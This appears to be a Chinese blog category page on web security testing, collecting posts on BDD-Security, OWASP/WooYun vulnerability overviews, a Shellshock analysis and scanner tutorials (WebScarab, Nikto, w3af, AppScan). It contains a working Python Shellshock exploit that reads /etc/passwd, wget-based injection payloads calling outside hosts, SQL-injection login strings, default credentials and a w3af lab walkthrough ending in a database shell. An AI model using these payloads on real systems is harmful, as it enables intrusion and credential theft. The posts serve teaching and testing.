BlogJava-qileilove-随笔分类-安全性测试

在开发流程中嵌入安全测试

顺其自然EVO — Wed, 18 Mar 2015 14:10:00 GMT

　ContinuumSecurity创始人Stephen de Vries，在Velocity Europe 2014大会上提出了持续且可视化的安全测试的观点。Stephen表示，那些在敏捷开发过程中用于将QA嵌入整个开发流程的方法和工具都能同样的用于安全测试。BDD-Security是一个基于JBehave，且遵循Given-When-Then方法的安全测试框架。

　　传统的安全测试都遵循瀑布流程，也就是说安全团队总是在开发阶段的末期才参与进来，并且通常需要外部专家的帮助。在整个开发流程中，渗透测试总是被安排到很晚才做，使得为应用做安全防范的任务尤其困难且复杂。Stephen认为安全测试完全可以变得像QA一样：每个人都对安全问题负责；安全问题可以在更接近代码的层面考虑；安全测试完全可以嵌入一个持续集成的开发过程中。

　　为了论证QA和安全测试只有量的区别而没有质的区别，Stephen展示了C. Maartmann-Moe和Bill Sempf分别发布的推特：

　　从QA的角度：

　　QA工程师走进一家酒吧，点了一杯啤酒；点了0杯啤酒；点了999999999杯啤酒；点了一只蜥蜴；点了-1杯啤酒；点了一个sfdeljknesv。

　　从安全的角度：

　　渗透测试工程师走进一家酒吧，点了一杯啤酒；点了”>杯啤酒；点了’or 1=1-杯啤酒；点了() { :; }; wget -O /beers http://evil; /杯啤酒。　　要将安全测试集成进敏捷开发流程中，首先需要满足的条件是：可见性，以便采取及时应对措施并修补；可测试性，以便于自动化，比仅仅简单的扫描更有价值。Stephen发现BDD工具族就同时满足了可见性及可测试性，因此他开始着手构建BDD-Security安全测试框架。

　　由于BDD-Security是基于JBehave构建的，因此它使用BDD的标准说明语言Gherkin。一个BDD-Security测试场景如下：

　　Scenario: Transmit authentication credentials over HTTPS

　　Meta: @id auth_https

　　Given the browser is configured to use an intercepting proxy

　　And the proxy logs are cleared

　　And the default user logs in with credentials from: users.table

　　And the HTTP request-response containing the default credentials is inspected

　　Then the protocol should be HTTPS

　　BDD-Security用户故事的编写与通常做法不太一样。BDD-Security说明页面上写着：

　　本框架的架构设计使得安全用例故事与应用的特定导航逻辑相互独立，这意味着同一个用户故事仅需要做微小的改动就能用在多个应用中，有时甚至无需修改。

　　这也说明BDD-Security框架认为对许多应用来说，有一系列安全需求都是普遍要满足的。也就是说你只需写代码把已有的故事插入你的应用——也就是导航逻辑中即可。当然，必要的时候你也完全可以编写自己的用户故事。

　　BDD-Security依赖于第三方安全测试工具来执行具体的安全相关的行为，例如应用扫描。这些工具有OWASP ZAP或Nessus等。

　　Stephen还提到其它一些有类似功能的工具。如Zap-WebDriver就是一款更简单的工具，不喜欢BDD方式的人可以考虑采用它。Gauntlt与BDD-Security框架类似，同样支持BDD，只是它使用的编程语言是Ruby。Mittn用Python编写并且同样也使用Gherkin。

顺其自然EVO 2015-03-18 22:10 发表评论

渗透测试必知必会—Web漏洞

顺其自然EVO — Mon, 22 Dec 2014 15:42:00 GMT

　　0x00前言

　　本文为对WEB漏洞研究系列的开篇，日后会针对这些漏洞一一研究，敬请期待

　　0x01 目录

　　0x00 前言

　　0x01 目录

　　0x02 OWASP TOP10 简单介绍

　　0x03 乌云TOP 10 简单介绍

　　0x04 非主流的WEB漏洞

　　0x02 OWASP TOP10 简单介绍

　　除了OWASP的TOP10，Web安全漏洞还有很多很多，在做测试和加固系统时也不能老盯着TOP10，实际上是TOP10中的那少数几个

　　直接说2013的：

　　A1: 注入，包括SQL注入、OS注入、LDAP注入。SQL注入最常见，wooyun.org || http://packetstormsecurity.com 搜SQL注入有非常多的案例，由于现在自动化工具非常多，通常都是找到注入点后直接交给以sqlmap为代表的工具

　　命令注入相对来说出现得较少，形式可以是：

　　https://1XX.202.234.22/debug/list_logfile.php?action=restartservice&bash=;wget -O /Isc/third-party/httpd/htdocs/index_bak.php http://xxphp.txt;

　　也可以查看案例：极路由云插件安装shell命令注入漏洞，未对用户输入做任何校验，因此在web端ssh密码填写处输入一条命令`dropbear`便得到了执行

　　直接搜索LDAP注入案例，简单尝试下并没有找到，关于LDAP注入的相关知识可以参考我整理的LDAP注入与防御解析。虽然没有搜到LDAP注入的案例，但是重要的LDAP信息泄露还是挺多的，截至目前，乌云上搜关键词LDAP有81条记录。

　　PHP对象注入：偶然看到有PHP对象注入这种漏洞，OWASP上对其的解释为：依赖于上下文的应用层漏洞，可以让攻击者实施多种恶意攻击，如代码注入、SQL注入、路径遍历及拒绝服务。实现对象注入的条件为：1) 应用程序必须有一个实现PHP魔术方法(如 __wakeup或 __destruct)的类用于执行恶意攻击，或开始一个"POP chain"；2) 攻击中用到的类在有漏洞的unserialize()被调用时必须已被声明，或者自动加载的对象必须被这些类支持。PHP对象注入的案例及文章可以参考WordPress < 3.6.1 PHP 对象注入漏洞。

　　在查找资料时，看到了PHP 依赖注入，原本以为是和安全相关的，结果发现：依赖注入是对于要求更易维护，更易测试，更加模块化的代码的解决方案。果然不同的视角，对同一个词的理解相差挺多的。

　　A2: 失效的身份认证及会话管理，乍看身份认证觉得是和输入密码有关的，实际上还有会话id泄露等情况，注意力集中在口令安全上：

　　案例1：空口令

　　乌云：国内cisco系列交换机空密码登入大集合

　　乌云：UC某服务器可空口令访问数据库

　　案例2：弱口令

　　乌云：盛大某站后台存在简单弱口令可登录　　admin/admin

　　乌云：电信某省客服系统弱口令泄漏各种信息　.../123456

　　乌云：中国建筑股份有限公司OA系统tomcat弱口令导致沦陷　　tomcat/tomcat

　　案例3：万能密码

　　乌云：移动号码上户系统存在过滤不严　　admin'OR'a'='a/admin'OR'a'='a (实际上仍属于SQL注入)

　　弱口令案例实在不一而足

　　在乌云一些弱口令如下：其中出镜次数最高的是：admin/admin, admin/123456

如果要继续深究下去或者取得更多数据进行分析的话，结局就会如猪猪侠总结的那样：

　　当然会话存在的安全问题也是需要考虑的，可以是令牌、token被窃取，尤其当会话没有设置生命周期时很容易出现会话/身份被劫持

　　会话管理问题可以是用户A登陆了某个地址，但是没有注销(奇葩情况是注销无效)，直接退出了浏览器又没有清除cookie，如果说这时候有B借用A的电脑，他直接以A的身份登陆该地址是没有问题的，这不是服务端的问题。但假设之后A都没有访问改地址，而是把电脑合上待机了，第二天如果B借用他的电脑直接登陆了该地址，则责任在于服务端的会话管理不当，没有设置超时时间。除此之外，还有会话重放、会话信息泄露等问题。说到会话信息泄露，不禁想起将sessionid放在URL中的情形，鄙人暂未遇到直接利用这个可以窃取会话的，但不排除其可能

　　A3: 跨站脚本(XSS)，最普遍的漏洞，曾被认为是鸡肋漏洞，事实证明有时候危害很大的，窃取cookie，构造蠕虫不一而足。XSS的技术体现在Javascript功底上，现在很多网站都有针对XSS的过滤器，J2EE可以使用全局过滤器，但是过滤器基本都是使用黑名单设防，是有可能绕过的，回应了技术体现在Javascript功底上。跨站脚本还有flash类型的，由于相比之下出现得比较少，浏览器和过滤器的防御精力不在这上面，如果出现可能更容易成功。值得一提的是，对于XSS，现在的扫描工具都会将其标识为高危漏洞，实际上扫描器根据返回的响应中是否有加入的载荷来判断跨站脚本漏洞存在的可能性，误报率会比较高。还有就是常规扫描器只能识别反射型XSS，反射型XSS本身危害是比较小的，存储型XSS危害才大(危害大小看具体情况)。反射型XSS现在常规payload要想过IE10、IE11或chrome还是有难度的，因此XSS技术的另一个体现方面即是对浏览器特性的了解。至于存储型XSS，则要看具体业务和数据是否会受影响，用户交互程度越高，利用难度就越大，如果能弹框证实漏洞存在，但很难被触发或者就算窃取到cookie也无法登陆，很难说明是高风险安全问题，但还是有修复和改进的必要。

　　A4: 不安全的直接对象引用，访问控制不当的问题，常见为越权操作(横向+纵向)，譬如：遍历用户id批量获取用户信息、在HTTP请求中篡改某个参数的值就变成了其他身份进行的操作，最激动人心的是可以进行刷钱等操作。越权问题并不高深，相比SQL注入和XSS技术难度还要低一点，因为通常只要改参数值就可以了(一般来说)。防止此类问题的做法很简单，当用户需要访问某资源或进行操作时，服务器端取出来访用户的session值，判断是否具有访问或操作权限。

　　在访问控制操作中，我们可以设定某一资源或文件A可以访问、B不能访问，但是当对应的用户多起来时也会遇到麻烦。也可以为用户访问资源或文件标志一个权限，作为一个会话属性，属于自己的才可以操作或访问，具体情况具体讨论。

　　案例1：水平越权

　　乌云：虎扑某功能存在水平越权

　　案例2：垂直越权

　　乌云：中国电信某系统管理员WEB界面越权访问

　　A5-A7\A9: 安全配置错误\敏感数据泄露\功能级访问控制缺失\使用含已知漏洞的组件=>运维不当，直接看运维不当的

　　ftp弱口令或支持匿名访问导致信息泄露

　　RTX泄露信息

　　Ganglia信息泄露

　　j2ee应用架构开始占主流，典型的web服务器搭配配置失误

　　padding oracle attack

　　用户名密码放在服务器上……

　　A8: 跨站请求伪造(CSRF)

　　CSRF曾被称为沉睡的巨人，以前拿来举例时都是说Alice给Bob转钱，结果morry插了一脚，钱就跑到morry家去了。危害可大可小，直接通过URL增删改操作的也还有，更多的还是基于表单。如果是XSS+CSRF =>蠕虫就比较可观了，也曾看到过直接get root的案例

案例：万达电影主站 xss + csrf

　　A10: 无效的重定向

　　控制重定向可以钓鱼，可以获取敏感文件的信息，在struts2中也有开放重定向的命令执行

　　0x03 乌云TOP 10 简单介绍

　　上述就是OWASP TOP10的WEB漏洞，乌云出了一个更加符合中国国情的乌云：Top10 for 2014，看着也是触目惊心

　　A1-互联网泄密事件/撞库攻击

　　本质上来说是使用了不安全的口令，也许我可以将自己的密码设置的很复杂，别人破解不出来。但对于撞库攻击而言，可以说是不怕神一样的对手，就怕猪一样的队友。我们注册使用的网站或服务商他们保存了我们使用的密码，而很多时候被泄露出去了我们并不知道。这也是考验我们密码习惯的时候了，强密码+不同的密码，当然密码多了也难以记住，不行就借助软件或者普通账号用同一个密码，重要账号用不同密码吧

　　A2-引用不安全的第三方应用

　　举的例子是heart bleed漏洞使用的openssl，另外struts2的漏洞也还数见不鲜，其次就是CMS如wordpress使用的插件,当然shellshock也会有很多中枪的

　　A3-系统错误/逻辑缺陷带来的暴力猜解

　　暴力破解：没对请求和错误次数做限制；重放攻击同样是没做检验或限制

　　A4-敏感信息/配置信息泄露

　　包括但不限于目录遍历、日志、配置文件、svn目录、github或其他博客等地方

　　A5-应用错误配置/默认配置

　　包括但不限于默认路径、默认口令、目录穿越、任意文件下载等

　　A6-SQL注入漏洞

　　A7-XSS跨站脚本攻击/CSRF

　　A8-未授权访问/权限绕过

　　可匿名访问\判断referer值后免登陆

　　A9-账户体系控制不严/越权操作

　　A10-内部重要资料/文档外泄

　　还是信息泄露，但是做了区分，不同于应用或服务器的信息泄露，专指内部信息泄露哟

　　0x04 非主流的WEB漏洞

　　实际上，如果要挖漏洞或者做测试，从乌云上找案例会比较方便，除了常见的几类代码层面的问题，更多的是配置不当方面的，最终归结到信息安全链上最脆弱的还是人本身

　　除了上面提到的这些，其实还有很多的漏洞啊，跟设备有关系的就先不说了，再提一下两个看起来不错的：XXE、SSRF(or XSPA)

　　XXE：XML外部实体注入，不仅仅是敏感信息泄露，腾讯安全中心：XXE漏洞攻防

　　案例：

　　1. 乌云：百度某功能XML实体注入

　　2. 乌云：139邮箱XXE漏洞可读取文件

　　3. 乌云：从开源中国的某XXE漏洞到主站shell

　　SSRF(服务端请求伪造): 据说用这招可以成功多次进入阿里、腾讯、百度等的内网，没爆出来的估计很多被用作杀器了

　　上面几个案例有的是分享功能，有的是其他功能，共同点在于都是跟的url参数，且没做限制，导致内网信息泄露

　　（未完...）

顺其自然EVO 2014-12-22 23:42 发表评论

Bash远程命令执行漏洞(CVE-2014-6271)分析利用

顺其自然EVO — Wed, 26 Nov 2014 06:20:00 GMT

　这几天Bash被爆存在远程命令执行漏洞(CVE-2014-6271)，昨天参加完isc，晚上回家测试了一下，写了个python版本的测试小基本，贴上代码：

#coding:utf-8

import urllib,httplib

import sys,re,urlparse

#author:nx4dm1n

#website:www.nxadmin.com

def bash_exp(url):

urlsp=urlparse.urlparse(url)

hostname=urlsp.netloc

urlpath=urlsp.path

conn=httplib.HTTPConnection(hostname)

headers={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}

conn.request("GET",urlpath,headers=headers)

res=conn.getresponse()

res=res.getheaders()

for passwdstr in res:

print passwdstr[0]+':'+passwdstr[1]

if __name__=='__main__':

#带http

if len(sys.argv)<2:

print "Usage: "+sys.argv[0]+"www.nxadmin.com/cgi-bin/index.cgi"

sys.exit()

else:

bash_exp(sys.argv[1])

　　脚本执行效果如图所示：

　　bash命令执行

　　也可以用burp进行测试。

　　利用该漏洞其实可以做很多事情，写的python小脚本只是执行了cat /etc/passwd。可以执行反向链接的命令等，直接获取一个shell还是有可能的。不过漏洞存在的条件也比较苛刻，测试找了一些，发现了很少几个存在漏洞。

顺其自然EVO 2014-11-26 14:20 发表评论

Web安全测试-WebScarab工具介绍

顺其自然EVO — Thu, 06 Nov 2014 02:32:00 GMT

　1.1 Webscarab

　　【功能】

　　WebScarab是一个用来分析使用HTTP和HTTPS协议的应用程序框架。其原理很简单，WebScarab可以记录它检测到的会话内容（请求和应答），并允许使用者可以通过多种形式来查看记录。WebScarab的设计目的是让使用者可以掌握某种基于HTTP（S）程序的运作过程；可以用它来调试程序中较难处理的bug，也可以帮助安全专家发现潜在的程序漏洞。

　　【适用对象】

　　分析使用HTTP和HTTPS协议的应用程序框架

　　1.1.1 工具安装

　　WebScarab需要在java环境下运行，因此在安装WebScarab前应先安装好java环境（JRE或JDK均可）。

　　安装好jdk后，右击安装文件：webscarab-installer-20070504-1631.jar 选择“打开方式”如下图：

　　然后进入安装界面，下一步下一步安装即可。

　　1.1.2 功能原理

　　webscarab工具的主要功能：它可以获取客户端提交至服务器的http请求消息，并以图形化界面显示，支持对http请求信息进行编辑修改。

　　原理：webscarab工具采用web代理原理，客户端与web服务器之间的http请求与响应都需要经过webscarab进行中转，webscarab将收到的http请求消息进行分析，并将分析结果图形化显示，如下图：

　　可以用于验证当客户端对输入有限制时（如长度限制、输入字符集的限制等），可以使用此种方法绕过客户端验证服务端是否对输入有限制。

　　1.1.3 工具使用

　　下面将主要介绍如何使用webscarab工具对post请求进行参数篡改

　　1、运行WebScarab

　　WebScarab有两种显示模式：Lite interface和full-featured interface，可在Tools菜单下进行模式切换，需要重启软件生效，修改http请求信息需要在full-featured interface下进行。

　　2、点击Proxy标签页->Manual Edit标签页

　　3、选中Intercept requests

　　在Methods中列举了http1.1协议所有的请求方法，用来选择过滤，如我们选择了post，那WebScarab只能对post请求的http消息进行篡改。

　　4、打开IE浏览器的属性，进入连接》局域网设置，在代理地址中配置host为127.0.0.1或localhost，port为8008

5、以上配置便完成了，下面选择一个功能测试一下，以登录为例，打开webScarab工具后，在浏览器中输入需访问的url地址，此时WebSarab会获取到页面的所有请求消息并弹出需要修改的会话框，

　　输入正确信息，点击修改，此时WebScarab会弹出提示框，显示http传递参数信息，可以http请求进行新增、删除和修改参数操作，修改后点击“Accept changes”按钮。

　　1.1.34 使用心得

　　WebScarab是一款很强大的http消息分析工具，它可以让我们清楚地观察到客户端的http请求消息，同时支持对http消息的修改编辑，很适合web安全性篡改表单数据测试。

顺其自然EVO 2014-11-06 10:32 发表评论

如何使用Nikto漏洞扫描工具检测网站安全

顺其自然EVO — Thu, 30 Oct 2014 03:16:00 GMT

　Nikto是一款开放源代码的、功能强大的WEB扫描评估软件，能对web服务器多种安全项目进行测试的扫描软件，能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他问题，它可以扫描指定主机的WEB类型、主机名、特定目录、COOKIE、特定CGI漏洞、返回主机允许的 http模式等等。它也使用LibWhiske库，但通常比Whisker更新的更为频繁。Nikto是网管安全人员必备的WEB审计工具之一。

　　Nikto最新版本为2.0版，可以去官方下载

　　Nikto是基于PERL开发的程序，所以需要PERL环境。Nikto支持Windows（使用ActiveState Perl环境）、Mac OSX、多种Linux 或Unix系统。Nikto使用SSL需要Net::SSLeay PERL模式，则必须在Unix平台上安装OpenSSL。具体的可以参考nikto的帮助文档。

　　从官方网站上下载nikto-current.tar.gz文件，在Linux系统解压操作：

　　tar -xvf nikto-current.tar.gz

　　gzip -d nikto-current.tar

　　解压后的结果如下所示：

　　Config.txt、docs、kbase、nikto.pl、plugins、 templates

　　Nikto的使用说明：

　　Nikto扫描需要主机目标IP、主机端口。默认扫描的是80端口。扫描主机目标IP地址可以使用选项-h(host)。下面将扫描IP为192.168.0.1的TCP 80端口，如下所示：

　　perl nkito.pl –h 192.168.0.1

　　也可以自定义扫描的端口，可以使用选项-p(port)，下面将扫描IP为192.168.0.1的TCP 443端口，如下所示：

　　perl nikto.pl –h 192.168.0.1 –p 443

　　Nikto也可以同时扫描多个端口，使用选项-p(port)，可以扫描一段范围（比如：80-90），也可以扫描多个端口（比如：80,88,90）。下面扫描主机的80/88/443端口，如下所示：

　　Perl nikto.pl –h 192.168.0.1 –p 80,88,443

　　如果运行Nikto的主机是通过HTTP proxy来访问互联网的，也可以使用代理来扫描，使用选项-u(useproxy)。下面将通过HTTP proxy来扫描，如下所示：

　　Perl nikto.ph –h 192.168.0.1 –p 80 –u

　　Nikto的更新：

　　Nikto的升级可以通过-update的命令来更新插件和数据库，如下所示：

　　Perl nikto.ph –update

　　也可以通过从网站下载来更新插件和数据库：[url]http://updates.cirt.net/[/url]

　　Nikto的选项说明：

　　-Cgidirs

　　扫描CGI目录。

　　-config

　　使用指定的config文件来替代安装在本地的config.txt文件

　　-dbcheck

　　选择语法错误的扫描数据库。

　　-evasion

　　使用LibWhisker中对IDS的躲避技术，可使用以下几种类型：

　　1．随机URL编码（非UTF-8方式）

　　2．自选择路径（/./）

　　3．虚假的请求结束

　　4．长的URL请求

　　5．参数隐藏

　　6．使用TAB作为命令的分隔符

　　7．大小写敏感

　　8．使用Windows路径分隔符\替换/

　　9．会话重组

　-findonly

　　仅用来发现HTTP和HTTPS端口，而不执行检测规则

　　-Format

　　指定检测报告输出文件的格式，默认是txt文件格式（csv/txt/htm）

　　-host

　　目标主机，主机名、IP地址、主机列表文件。

　　-id

　　ID和密码对于授权的HTTP认证。格式：id:password

　　-mutate

　　变化猜测技术

　　1.使用所有的root目录测试所有文件

　　2.猜测密码文件名字

　　3.列举Apache的用户名字(/~user)

　　4.列举cgiwrap的用户名字(/cgi-bin/cgiwrap/~user)

　　-nolookup

　　不执行主机名查找

　　-output

　　报告输出指定地点

　　-port

　　扫描端口指定，默认为80端口。

　　-Pause

　　每次操作之间的延迟时间

　　- Display

　　控制Nikto输出的显示

　　1.直接显示信息

　　2.显示的cookies信息

　　3.显示所有200/OK的反应

　　4.显示认证请求的URLs

　　5.Debug输出

　　-ssl

　　强制在端口上使用SSL模式

　　-Single

　　执行单个对目标服务的请求操作。

　　-timeout

　　每个请求的超时时间，默认为10秒

　　-Tuning

　　Tuning 选项控制Nikto使用不同的方式来扫描目标。

　　0．文件上传

　　1.日志文件

　　2.默认的文件

　　3.信息泄漏

　　4.注射（XSS/Script/HTML）

　　5.远程文件检索（Web 目录中）

　　6.拒绝服务

　　7.远程文件检索（服务器）

　　8.代码执行－远程shell

　　9.SQL注入

　　a.认证绕过

　　b.软件关联

　　g.属性（不要依懒banner的信息）

　　x.反向连接选项

　　-useproxy

　　使用指定代理扫描

　　-update

　　更新插件和数据库

　　例子：使用Nikto扫描目标主机10.0.0.12的phpwind论坛网站。

　　Perl nikto.pl –h 10.0.0.12 –o test.txt

　　通过上面的扫描结果，我们可以发现这个Phpwind论坛网站，是在windows操作系统上，使用Apache/2.2.4版本，Php/5.2.0版本，以及系统默认的配置文件和路径等。

　　综上所述，Nikto工具可以帮助我们对Web的安全进行审计，及时发现网站存在的安全漏洞，对网站的安全做进一步的扫描评估。

顺其自然EVO 2014-10-30 11:16 发表评论

W3af简单使用教程

顺其自然EVO — Sat, 11 Oct 2014 03:09:00 GMT

　w3af是一个Web应用程序攻击和检查框架.该项目已超过130个插件,其中包括检查网站爬虫,SQL注入(SQL Injection),跨站(XSS),本地文件包含(LFI),远程文件包含(RFI)等.该项目的目标是要建立一个框架,以寻找和开发Web应用安全漏洞,所以很容易使用和扩展.

　　0×00 概述

　　在BackTrack5R3下使用w3af测试Kioptrix Level 4的SQL注入漏洞.

　　0×01 简介

　　w3af是一个Web应用程序攻击和检查框架.该项目已超过130个插件,其中包括检查网站爬虫,SQL注入(SQL Injection),跨站(XSS),本地文件包含(LFI),远程文件包含(RFI)等.该项目的目标是要建立一个框架,以寻找和开发Web应用安全漏洞,所以很容易使用和扩展.

　　0×02 安装

　　root@bt:~# apt-get install w3af

　　0×03 启动

　　root@bt:~# cd /pentest/web/w3af/root@bt:/pentest/web/w3af# ./w3af_console

　　0×04 漏洞扫描配置

　　w3af>>> plugins//进入插件模块w3af/plugins>>> list discovery //列出所有用于发现的插件w3af/plugins>>> discovery findBackdoor phpinfo webSpider //启用findBackdoor phpinfo webSpider这三个插件w3af/plugins>>> list audit //列出所有用于漏洞的插件w3af/plugins>>> audit blindSqli fileUpload osCommanding sqli xss //启用blindSqli fileUpload osCommanding sqli xss这五个插件w3af/plugins>>> back//返回主模块w3af>>> target//进入配置目标的模块w3af/config:target>>>set target http://192.168.244.132///把目标设置为http://192.168.244.132/w3af/config:target>>> back//返回主模块

　　0×05 漏洞扫描

w3af>>> start

---New URL found by phpinfo plugin: http://192.168.244.132/New URL found by phpinfo plugin: http://192.168.244.132/checklogin.phpNew URL found by phpinfo plugin: http://192.168.244.132/index.phpNew URL found by webSpider plugin: http://192.168.244.132/New URL found by webSpider plugin: http://192.168.244.132/checklogin.phpNew URL found by webSpider plugin: http://192.168.244.132/index.phpFound 3 URLs and 8 different points of injection.The list of URLs is:- http://192.168.244.132/index.php- http://192.168.244.132/checklogin.php- http://192.168.244.132/The list of fuzzable requests is:- http://192.168.244.132/ | Method: GET- http://192.168.244.132/ | Method: GET | Parameters: (mode="phpinfo")- http://192.168.244.132/ | Method: GET | Parameters: (view="phpinfo")- http://192.168.244.132/checklogin.php | Method: GET- http://192.168.244.132/checklogin.php | Method: POST | Parameters: (myusername="", mypassword="")- http://192.168.244.132/index.php | Method: GET- http://192.168.244.132/index.php | Method: GET | Parameters: (mode="phpinfo")- http://192.168.244.132/index.php | Method: GET | Parameters: (view="phpinfo")Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989.A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John&Submit=Login&mypassword=d'z"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.Scan finished in 19 seconds.---//开始扫描

　　0×06 漏洞利用配置

　　w3af>>> exploit //进入漏洞利用模块w3af/exploit>>> list exploit//列出所有用于漏洞利用的插件w3af/exploit>>> exploit sqlmap //使用sqlmap进行SQL注入漏洞的测试

---Trying to exploit using vulnerability with id: [1010, 1011]. Please wait...Vulnerability successfully exploited. This is a list of available shells and proxies:- [0] = 5.0.0" | ruser: "root@localhost" )>Please use the interact command to interact with the shell objects.---//测试存在SQL注入漏洞//这里要记住shell objects(这里是0),等一下要用到0x07 漏洞利用w3af/exploit>>> interact 0//interact + shell object就可以利用了---Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shellw3af/exploit/sqlmap-0>>> ---//sqlmap的一个交互式模块w3af/exploit/sqlmap-0>>> dbs ---Available databases: [3]:[*] information_schema[*] members[*] mysql---//成功获得数据库信息

顺其自然EVO 2014-10-11 11:09 发表评论

AppScan Source V8.8 中弃用的功能

顺其自然EVO — Wed, 24 Sep 2014 07:33:00 GMT

从 AppScan Source V8.8 开始，不再支持以下操作系统：

　　Microsoft Windows XP

　　Microsoft Windows Server 2003，所有版本和修订版

　　此外：

　　Visual Studio 2005 项目文件不再受支持，而且 AppScan Source for Development（Visual Studio 插件）不再能适用于 Visual Studio 2005。

　　Eclipse V3.3、V3.4 和 V3.5 项目文件和工作空间不再受支持，而且 AppScan Source for Development（Eclipse 插件）不再能适用于 Eclipse V3.3、V3.4 和 V3.5。

　　Rational Application Developer for WebSphere? Software (RAD) V7.x 项目文件和工作空间不再受支持，而且 IBM Security AppScan Source for Development plug-in for IBM Rational Application Developer for WebSphere Software (RAD) 不再能适用于 RAD V7.x。

　　Java 和 JSP 编译不再支持 Tomcat V3 (Jasper 1)。如果要升级 AppScan Source 并使用该版本的 Tomcat，您需要将 Tomcat 升级到 AppScan Source V8.8 支持的版本（请参阅 AppScan Source 系统需求以了解受支持的 Tomcat 版本）。

　　IBM Rational ClearQuest? V7.0 和 IBM Rational Team Concert? V2.0.0.2 不再是受支持的缺陷跟踪系统。

　　注意：如果之前装的8.7的AppScan Enterprise Server，现在把AppScan Source升级到8.8，运行会提示版本不兼容！

顺其自然EVO 2014-09-24 15:33 发表评论

IBM Rational Appscan使用之扫描结果分析

顺其自然EVO — Fri, 19 Sep 2014 01:56:00 GMT

　之前有IBM Rational Appscan使用详细说明的一篇文章，主要是针对扫描过程中配置设置等.本文将介绍针对扫描结果的分析,也是一次完整的渗透测试必须经历的环节.

　　扫描开始的时候,Appscan会询问是否保存扫描结果,同时下方有进度条显示扫描的进度.

　　在扫描过程中，如果遇到任何连接问题或其他任何问题，可以暂停扫描并在稍后继续进行.如第一篇文章中讲的扫描包括两个阶段-探索、测试.Appscan种的Scan Expert和HP WebInspect中的建议选项卡类似,Scan Expert分析扫描的配置，然后针对变化给出配置建议,目的是为了更好的执行一次扫描.可以选择忽略或者执行这些建议.

　　Appscan的窗口大概分三个模块,Application Links(应用链接), Security Issues(安全问题), and Analysis(分析)，如下图所示:

　　Application Links Pane(应用程序结构)

　　这一块主要显示网站的层次结构,基于URL和基于内容形式的文件夹和文件等都会在这里显示,在旁边的括号里显示的数字代表存在的漏洞或者安全问题.通过右键单击文件夹或者URL可以选择是否忽略扫描此节点.Dashboard窗格会根据漏洞严重程序，高中低列出网站存在的问题情况,因此Dashboard将反映一个应用程序的整体实力。

　　Security Issues Pane(安全问题)

　　这个窗格主要显示应用程序中存在的漏洞的详细信息.针对没一个漏洞，列出了具体的参数.通过展开树形结构可以看到一个特定漏洞的具体情况，如下所示：

　　根据扫描的配置,Appscan会针对各种诸如SQL注入的关键问题，以及像邮件地址模式发现等低危害的漏洞进行扫描并标识出来.因为扫描策略选择了默认，Appscan会展示出各种问题的扫描情况.右键单击某个特定的漏洞可以改变漏洞的的严重等级为非脆弱,甚至可以删除.

　　Analysis Pane(分析)

　　选择Security Issues窗格中的一个特定漏洞或者安全问题，会在Analysis窗格中看到针对此漏洞或者安全问题的四个方面:Issue information(问题信息), Advisory(咨询), Fix Recommendation(修复建议), Request/Response(请求/相应).

　　Issue information(安全问题信息)

　　Issue information 标签下给出了选定的漏洞的详细信息,显示具体的URL和与之相关的安全风险。通过这个可以让安全分析师需要做什么，以及确认它是一个有效的发现。

　　Advisory(咨询)

　　在此选项卡，你可以找到问题的技术说明，受影响的产品，以及参考链接。

　　Fix Recommendation(修复建议)

　　本节中会提到解决一个特定问题所需要的步骤.

　　Request/Response(请求/响应)

　　此标签显示发送给应用程序测试相关反应的具体请求的细节.在一个单一的测试过程中，根据安全问题的严重性会不止发送一个请求.例如，检查SQL盲注漏洞，首先AppScan中发送一个正常的请求，并记录响应。然后发送一个SQL注入参数，然后再记录响应.同时发送另外一个请求，来判断条件,根据回显的不同，判断是否存在脆弱性漏洞。在此选项卡，有以下一些标签.如图：

　　Show in Browser(在浏览器显示),让你在浏览器看到相关请求的反应,比如在浏览器查看跨站脚本漏洞.实际上会出现警从Appscan发出的弹窗信息.

　　Report False Positive(报告误报)，如果发现误报，可以通过此标签发送给Appscan团队.

　　Manual Test(手动测试),单击此项之后会打开一个新的窗口，允许您修改请求并发送来观察响应.这个功能类似Burp Suite中的"repeate"选项.

　　Delete Variant(变量删除)，从结果中删除选中的变量.

　　Set as Non-vulnerable(非脆弱性设置),选取的变量将被视为非脆弱性.

　　Set as Error Page(设置为错误页面), 有时应用程序返回一个定制的错误页面,通过此选项可以设置错误页面，避免Appscan因为扫描响应为200而误报.

　　Understanding the Toolbar(了解工具栏)

Scan按钮,开始扫描探测，继续扫描探测.

　　Manual Explore(手动扫描)按钮可以用于如果只想扫描特定的URL或者网站的一部分,可以记录输入链接，然后点击"Continue with Full Scan(继续全面扫描)",Appscan就只会扫描手动扫描设置下的链接.

　　Scan Configuration(扫描配置) 按钮会打开配置向导.

　　通过点击report按钮，可以生成一份详细的扫描分析报告.

　　Scan Log(扫描日志)记录AppScan中进行的扫描的每一个动作。因此，使用此功能，您可以跟踪所有的活动。例如，扫描运行时，你可以查看此时AppScan中正在寻找什么。

　　Analyze JavaScript(分析Javascript)按钮执行的JavaScript分析，发现广泛的客户端的问题，如基于DOM的跨站脚本.

　　可以在View Application Data下查看其他各种结果。比如访问的网址，断开的链接，JavaScript,Cookies等.

　　以上是对Appscan中的工具功能进行简单的了解,继续进行结果分析,可能需要先解决高的严重性的漏洞或者安全问题.首先选择一个脆弱的网址或参数的分析，如下图所示:

　　在分析( analysis)选项卡下会自动获得相关的强调细节,首先需要判断是否是一个脆弱性漏洞，或者是一个误报.这个判断完全取决与你的技术水平，如果确定是误报，可以右键进行删除.如果是正确的判断,可以继续分析下一个扫描结果,全部分析完成可以生成一个分析报告.

　　下面的一些提示将有对分析有所帮助:

　　Tips for Analysing(分析注意事项)

　　1.分析扫描结果的同时，如果发现不是你的应用程序有关的问题，可以点击右上角的Vulnerability-->State-->Noise.这个扫描将会完全从列表中删除此扫描结果.如果想显示,可以在View-->Show issues Marker as Noise(显示标记为杂讯的问题),将会显示带有删除线的灰色文本中的问题.

